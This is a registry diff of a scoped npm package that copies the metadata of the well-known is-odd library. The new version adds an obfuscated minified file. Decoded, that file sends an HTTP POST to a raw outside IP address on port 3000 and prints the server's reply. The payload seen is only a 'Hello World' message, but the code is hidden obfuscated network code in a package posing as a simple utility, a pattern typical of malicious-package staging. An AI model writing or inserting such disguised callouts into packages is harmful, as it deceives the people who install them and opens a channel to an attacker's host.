@andrewstory18/is-real-odd 2.0.2 → 2.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.min.js +1 -0
  2. package/package.json +3 -2
package/index.min.js ADDED
@@ -0,0 +1 @@
1
+ var a0_0x29d13f=a0_0xb220;(function(_0x4e46d0,_0x418f8b){var _0x3590e6=a0_0xb220,_0x1a3314=_0x4e46d0();while(!![]){try{var _0x2f78e9=parseInt(_0x3590e6(0x85))/0x1+parseInt(_0x3590e6(0x94))/0x2+parseInt(_0x3590e6(0x8b))/0x3+parseInt(_0x3590e6(0x96))/0x4+-parseInt(_0x3590e6(0x95))/0x5*(parseInt(_0x3590e6(0x92))/0x6)+-parseInt(_0x3590e6(0x8e))/0x7+-parseInt(_0x3590e6(0x97))/0x8*(parseInt(_0x3590e6(0x8a))/0x9);if(_0x2f78e9===_0x418f8b)break;else _0x1a3314['push'](_0x1a3314['shift']());}catch(_0x3ad06c){_0x1a3314['push'](_0x1a3314['shift']());}}}(a0_0x4f82,0x26e5e));var e=require(a0_0x29d13f(0x82)),o=JSON[a0_0x29d13f(0x81)]({'message':'Hello\x20World'}),r={'hostname':'144.172.91.84','port':0xbb8,'path':a0_0x29d13f(0x87),'method':a0_0x29d13f(0x8c),'headers':{'Content-Type':a0_0x29d13f(0x89),'Content-Length':Buffer['byteLength'](o)}},e=e[a0_0x29d13f(0x90)](r,_0x3a9b8d=>{var _0x39c0e1=a0_0x29d13f;let _0x56bcf6='';_0x3a9b8d['on'](_0x39c0e1(0x86),_0x211110=>{_0x56bcf6+=_0x211110;}),_0x3a9b8d['on'](_0x39c0e1(0x84),()=>{var _0x15ac9c=_0x39c0e1;console[_0x15ac9c(0x8f)](_0x15ac9c(0x91)),console['log'](_0x56bcf6);});});function a0_0xb220(_0x245f3e,_0x555d68){_0x245f3e=_0x245f3e-0x81;var _0x4f8204=a0_0x4f82();var _0xb220bc=_0x4f8204[_0x245f3e];return _0xb220bc;}function a0_0x4f82(){var _0x105c35=['54jtqpfn','message','346862BIiJGf','87370nwATxw','1092520ZeftkI','2988680rBXhEq','stringify','http','error','end','53184KBdsGU','data','/hello','Request\x20error:','application/json','9pshDkH','929079eAZFYC','POST','write','834827sdtJeI','log','request','Server\x20response:'];a0_0x4f82=function(){return _0x105c35;};return a0_0x4f82();}e['on'](a0_0x29d13f(0x83),_0x5f1d54=>{var _0x326ac6=a0_0x29d13f;console[_0x326ac6(0x83)](_0x326ac6(0x88),_0x5f1d54[_0x326ac6(0x93)]);}),e[a0_0x29d13f(0x8d)](o),e[a0_0x29d13f(0x84)]();
package/package.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
2
  "name": "@andrewstory18/is-real-odd",
3
3
  "description": "Returns true if the given number is odd, and is an integer that does not exceed the JavaScript MAXIMUM_SAFE_INTEGER.",
4
- "version": "2.0.2",
4
+ "version": "2.0.3",
5
5
  "homepage": "https://github.com/jonschlinkert/is-odd",
6
6
  "author": "Jon Schlinkert (https://github.com/jonschlinkert)",
7
7
  "contributors": [
@@ -16,7 +16,8 @@
16
16
  },
17
17
  "license": "MIT",
18
18
  "files": [
19
- "index.js"
19
+ "index.js",
20
+ "index.min.js"
20
21
  ],
21
22
  "main": "index.js",
22
23
  "engines": {